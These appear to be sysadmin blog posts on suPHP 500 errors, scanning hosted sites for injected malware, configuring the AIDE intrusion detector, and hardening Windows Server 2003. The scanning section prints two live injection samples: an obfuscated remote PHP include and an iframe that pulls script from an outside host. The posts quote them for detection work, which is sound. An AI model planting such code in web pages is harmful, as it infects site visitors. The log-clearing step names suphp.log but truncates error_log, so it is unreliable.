Why are you getting 500 internal server error on your php pages

Usually this happens in a suPHP environment. There could be few reasons why this could happen. We list here a few. The solution is intended for those with shell access.

• Ownership issues
  In a suPHP environment, depending on the mode of suPHP enabled on the VPS or server, there is a min_uid setting, which is configurable in suPHP.conf under /etc or /usr/local/etc or /opt/suphp/etc . By default the setting is 100, which means if the file is owned by a UID less than that value (100), it shouldn’t parse the php code and will result in 500 Internal Server Error. In a cPanel server, the error will be shown @ /usr/local/apache/logs/suphp.log. This restriction would enable better security, since even if a php can do some privilege escalation, it wont affect the server. Solution would be

  chown your_username.your_username path_of_your_php_file

  If that fixes only that file and not your entire php files, use the below command to change all the php files.

  find . -type f -name “*.php” -exec chown username.username {} \;
  find . -type d -exec chown username.username {} \;

  Ignore “*.php” in the above command if it still errors out for a php file. If it still don’t fix, move on to other solutions below.

• Permission issues
  It could be the world writable directories or files which is causing the issue. In a non-suphp environment, if a php script has to upload a file on a folder, (eg:  php based gallery script where customers are able to upload photos) inorder to get it uploaded to the folder, it needs to have world writable permissions. Or else apache can’t write to the folder. Here in suPHP, since the php is executed as the user itself who already have the permissions you don’t need to change it to 777 permissions and is happy with 755 (rwxr-xr-x) permissions. When a customer is moved from a non suPHP env to suPHP enabled server, we need to adjust the permissions then. Often a command like below should help

  find . -name “*.php” -type f -exec chmod 644 {} \;
  find . -type d -exec chmod 755 {} \;

  Often, you can do the above command without the -name “*.php” in the command.

• suphp.log exceeds 2GB size.If the entire servers’ php application gives you internal server error, next chance is that the suPHP log has exceeded 2GB space. Just clear the file and you are on track again. To null it, execute the command below. Below command assumes you are having the issue in a cPanel server
  

  cat /dev/null > /usr/local/apache/logs/error_log

• suPHP log don’t exist
  In a Plesk or Webmin or other servers, often the suPHP will be installed but /var/log/httpd or such folders where the suPHP.log can be created wont exist. suphp can understand and create a non-existent suphp.log, but you would need to manually create the folder /var/log/httpd. I hope you know how to create a folder though.

If you know any other cases which require another solution for this, please comment here or edit the blog.

How to do virus scan on Linux servers ?

Do you really need to do virus scan on Linux servers ? Sometimes yes. With the recent high level of iframe/php include/js injections, it seems we need to scan the pages for iframe injections, like below

< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? >
< iframe src=http://ms.nesseseni.cn/src.js >< /iframe >

Below are a few URLs which could help you in the process

http://www.google.com/safebrowsing/diagnostic?site=http://supportsages.com
http://www.malwaredomains.com/
http://www.malwaredomainlist.com/mdl.php – A regularly updated list.

You can install clamav antivirus which is open source and do a clamav scan to make sure that the website is not affected. On a cPanel server, the below command will scan the entire website files of each users.

clamscan -i -r –remove /home/*/public_html/

Why would I recommend clamav over other paid antivirus ? For obvious reasons that you can edit ClamAV rules to include more iframe detection rules. Just write a new regex rules in the clamav virus DBs and you have the situation under control, at least for those matching iframe codes.

Other solution would be mod_security 2.5 that could help preventing the page alteration using SQL injection and javascript injection and threats detailed in http://www.gnucitizen.org/blog/atom-2/

Here I was talking about server security. Once infected, there are a few things client has to do as well.

1. Scan your machine as well as your webmaster’ with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your WYSIWYG editors or in your FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer sftp though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic , request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostics tools of your choice (like Unmask Parasites ) to be sure your site is clean.

AIDE to aid your server security needs

A note on Intrusion Detection System
An Intrusion detection system (or IDS) is a software or hardware designed to detect unwanted attempts at accessing, manipulating, and/or disabling of computer systems through a network. Some of the best IDS applications know are Snort, Untangle, Tripwire, AIDE etc. Among the simplest to configure and use is AIDE.

What is AIDE
AIDE (Advanced Intrusion Detection Environment) is an intrusion detection program. It is a free replacement for Tripwire. AIDE constructs a database of the files specified in AIDE’s configuration file. The AIDE database stores various file attributes like permissions, inode number, user, group, file size, mtime and ctime, atime, growing size, number of links and link name. AIDE also creates a cryptographic checksum or hash of each file using message digest algorithms like sha, md5, rmd160, tiger etc. Also acl, xattr and selinux can be used if enabled during compile time.

Initially the administrator has to create an AIDE database on a new server before it is setup for networking or business (eg hosting). This AIDE database is a summary of the system in it’s normal state.It will hold information about system binaries, libraries, header files etc that are expected to remain the same over time.

Suppose someone has broken-into the system, though it is easier to manipulate file dates, sizes etc, it will be quite difficult for him to manipulate cryptographic checksum like md5. Thus by rerunning AIDE after a break-in, the administrator can quickly identify changes to files with high degree of accuracy.

AIDE Compilation
Some of the prerequisites (packages) for AIDE are:

• GCC compiler for C (gcc)
• GNU Flex (flex)
• GNU Bison (bison)
• GNU Make (make)
• Mhash library (libmhash2 and libmhash-dev)
• PostgreSQL Development Library (postgresql-server-dev)

Simple instructions using Ubuntu
Firstly become root by using the given command and then supplying your password:
sudo su -

For each prerequisite (say package gcc) search if it is installed or not by:
dpkg –get-selections|grep gcc

If you get:
gcc-4.3        install
then gcc is installed otherwise if you get no output then it means that gcc is not installed.

If the package gcc is not installed then use:
sudo apt-get install gcc

Once all the packages are installed then download aide from sourceforge.net/projects/aide. It will be a gzipped tar archive.

create a folder packages and extract the tar achieve in this folder using the command:
tar -xzvf aide-x.xx.x.tar.gz (replace x with version number)
now a folder by name aide-x.xx.x will be created

go inside that folder by:
cd aide-x.xx.x

now execute:
./configure
make
make install
make clean

open the aide config file and determine where the aide database is stored. Go to that location

To initialise the database perform:
aide -i
mv aide.db.new aide.db
then to check if aide works execute:
aide

Configuration of AIDE
AIDE has its config file located inside (if installed via package management software like synaptic, config file is /etc/aide/aide.conf) /usr/local/etc/aide.conf .
And it’s default executable is located inside /usr/local/bin/aide.

Explanation of the aide.conf file

database=file:/var/lib/aide/aide.db
location of the database to be read (This is the database taken as benchmark)

database_new=file:/var/lib/aide/aide.db.comp
location of the database for –compare is read (This is not present by default and is used only when we have to compare two distinct databases.)

database_out=file:/var/lib/aide/aide.db.new
location of the database to be written

AIDE uses a set of rules to determine what to check for within a particular file or directory. This is found inside aide.conf. These rules are also called groups.

#p:      permissions
#i:      inode
#n:      number of links
#l:      link name
#u:      user
#g:      group
#s:      size
#b:      block count
#m:      mtime
#a:      atime
#c:      ctime
#S:      check for growing size
#I:      ignore changed filename
#md5:    md5 checksum
#sha1:   sha1 checksum
#sha256: sha256 checksum
#sha512: sha512 checksum
#rmd160: rmd160 checksum
#tiger:  tiger checksum
#haval:  haval checksum
#crc32:  crc32 checksum
#E:        Empty group
#>:      Growing logfile p+l+u+g+i+n+S

These basic rules are then grouped to custom rules which define the collection of rules they comply to for example ‘pug: p+u+g’ means pug supports permissions, user and group rules together. You can alse create custom rules

#R:      p+i+l+n+u+g+s+m+c+acl+selinux+xattrs+md5
#L:      p+i+l+n+u+g+acl+selinux+xattrs
#MyRule: p+i+l+n+u+g

The following are available if you have mhash support enabled:

#gost:   gost checksum
#whirlpool: whirlpool checksum

The following are available when explicitly enabled using configure:

#acl:    access control list
#selinux SELinux security context
#xattr:  extended file attributes

AIDE has three types of selection lines

• Regular selection lines, beginning with “/”. This line is a file/dirctory path with or without regular expressions followed by a rule to be used here.
• Equals selection lines, beginning with “=”. This line is followed by a path to directory/file and tells aide not to proceed the rule into any subdirectory or file.
• Negative selection lines, beginning with “!”. This line is followed by a path to directory/file and tells aide what files/directories to ignore in database.

Next we have to decide what directories/files you want in the database

/etc p+i+u+g     #check only permissions, inode, user and group for etc
/bin MyRule      # apply the custom rule to the files in bin
/sbin MyRule     # apply the same custom rule to the files in sbin
/var MyRule
!/var/log/.*     # ignore the log dir it changes too often
!/var/spool/.*   # ignore spool dirs as they change too often
!/var/adm/utmp$  # ignore the file /var/adm/utmp

URLS that can be used
we have URLs in the database and database_out portion of aide.conf. These Urls can be any of the following. Input urls cannot be used as outputs and vice versa.

stdout

stderr Output is sent to stdout,stderr respectively.

stdin  Input is read from stdin.

file://filename
Input is read from filename or output is written to filename.

fd:number
Input is read from file-descriptor number or output is written to
number.

Useful Commands
aide -C : Performs a check on the filesystem ? (also same as: aide)
aide -i : Initialises or creates the benchmark database supplied by database_out directive (here it is aide.db.new)
aide -u -c /etc/aide.conf : update the database and use the specified config file

Usage
Before putting one’s server into the network, the admin will have to save a secure configuration of the system by:

aide -i

mv aide.db.new aide.db

The second command transfers the server’s earlier state(aide.db database) with the new one(aide.db.new). So be careful when you do this. It is advisable to keep a backup of the earlier database.

Next time in-order to check for any break-in perform
aide
or
aide -C

To compare the current database with some earlier backed-up database, give the path of the backed-up database to database_new option in aide.conf and perform:
aide –compare

The task of saving the old database and comparing with a new one has to be done periodically (preferably daily with the help of a cron task).

Reference Links

http://www.cs.tut.fi/~rammer/aide.html (Home Page)

http://sourceforge.net/projects/aide (Sourceforge Project Page)

http://www.cs.tut.fi/~rammer/aide/manual.html (Manual Page)

http://www.securityfocus.com/infocus/1424 (Reference)

http://www.penguin-soft.com/penguin/man/5/aide.conf.html (Reference)

Initial Hardening or Securing and performance tweaking of a Windows Server 2003 – Part I

I am hereby mentioning a brief howto on securing a default Windows Server 2003. 90% of the sages at SupportSages are Unix fanatics and I am a rebel belonging to the rest of 10% But often we get requests on securing Windows Servers and hence I am hereby briefing the basic steps we should take to secure a windows server. As the lead sage says, security is a process which starts even before the installation of OS or designing a network and can’t be done in a day or two, just the initial hardening can be. So the steps mentioned here is just the initial hardening. I would love to add more based on suggestions of you. I will mention the fundamentals of troubleshooting and fixing the permission issues of windows in another post. This post is for a standalone server and not a member of an AD (Active Directory).

For all the TUI/CLI guys out there. did you MS Windows Server 2008 can run without a GUI. You just have to install Server Core. You now can command Windows to do what you want

Subscribe to MS’s Security bulletin list at http://technet.microsoft.com/hi-in/security/dd252948(en-us).aspx lists.

Disable all services you do not need

Distributed File System
Distributed Link Tracking Client
Distributed Link Tracking Server
Fax Service
Indexing Service
Netmeeting Remote Desktop Sharing
Print Spooler
Telnet

Sevices you may or may not disable, if not already disabled. Usually a server installation turns this off. Did you know out of 86 default installed services 43 of them are disabled by default.

ClipBook
Computer Browser (On a server do you want this ?)
Help and Support (Again, don’t you have other sages around you for this?)
IMAPI CD-Burning COM Service (Dont need this)
Messenger
Remote Registry
TCP/IP NetBIOS Helper

Harden the TCP/IP Stack

Just like you do in Linux by editing sysctl.conf, you can configure various TCP/IP parameters in the Windows registry in order to protect against network-level denial of service attacks including SYN flood attacks, ICMP attacks and SNMP attacks. You can configure registry keys to:

* Enable SYN flood protection when an attack is detected.
* Set threshold values that are used to determine what constitutes an attack.

Follow the HowTo at http://msdn.microsoft.com/en-us/library/aa302363.aspx

Renaming the Administrator and Guest Account to something else.

Follow the Howto @ http://support.microsoft.com/kb/816109

In that Howto, the AD Users and Computers Snap in is taken by selecting “Start”, “Programs”, “Administrative Tools”, and “Active Directory Users and Computers” or by simply typing dsa.msc in the Start -> Run.

Enabling HTTP Compression

This is not security related, but may improve performance. Took from a website and hence including here also. But remember that Horde error happening for Middle East which is described earlier in one of the posts can creep in.

Check out the URL http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/d52ff289-94d3-4085-bc4e-24eb4f312e0e.mspx?mfr=true

DIsable parent paths (if enabled)

If we are doing monthly management of the server, even if the customer asks to enable parent paths, don’t do it on the server of a hosting firm. Lots of risks are there. Good thing is that in IIS 6.0 it is disabled by default. Ask the developers to use absolute path. If it is enabled, disable it. But on a live production server, if it is enable, before disabling the parent path communicate with the contact person for the firm as it may break websites using it.

• Start the Internet Services Manager (Start – Programs – Administrative Tools – Internet Services Manager
• Right click on the web site and select properties
• Select the ‘Home Directory’ tab
• Click the ‘Configuration’ button under the Application Settings
• Select the ‘App Options’ tab
• Uncheck the ‘Enable parent paths’ box and click Apply

Article  link here says how to enable it. http://support.microsoft.com/kb/q226474/ . But its for reference only.

Use Dedicated Application pools

Again performance related Always try to isolate websites using dedicated applicaiton pools. You can define it under IIS or in many control panels, it is just a click of the button or an option to be checked. Error in one dedicated pool will not affect other pool and hence othe websites. Also this will be helpful when troubleshooting / debugging issues as well.

Changing the RDC or Remote desktop port

Take registry using regedit and browse the hive keys to

HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control > TerminalServer > WinStations > RDP-Tcp

and then change the Registry subkey PortNumber to a non-default, above 1024 one.

On Server 2008, in addition to changing the registry key above, you also need to create a new Inbound TCP rule in your windows firewall to allow connections on your new port.  You can then disable the existing remote desktop inbound rule (which is hard coded to port 3389) and / or add a new one to allow your port. Below command should work also.

netsh advfirewall firewall add rule name=”New Remote desktop” dir=in action=allow protocol=TCP localport=’NEW_PORT_NO’

Refer http://support.microsoft.com/kb/947709 for more help on writing firewall rules.

If working on a hacked or suspected hack system, keep the Security Identifier list available at http://support.microsoft.com/kb/243330 handy.

Lots of tools useful for forensics and daily auditing purposes will be coming on next post or even this post itself will get re-published. Till then read about IPTables equivalent in windows (oh..No..Kinda equivalent) http://support.microsoft.com/kb/813878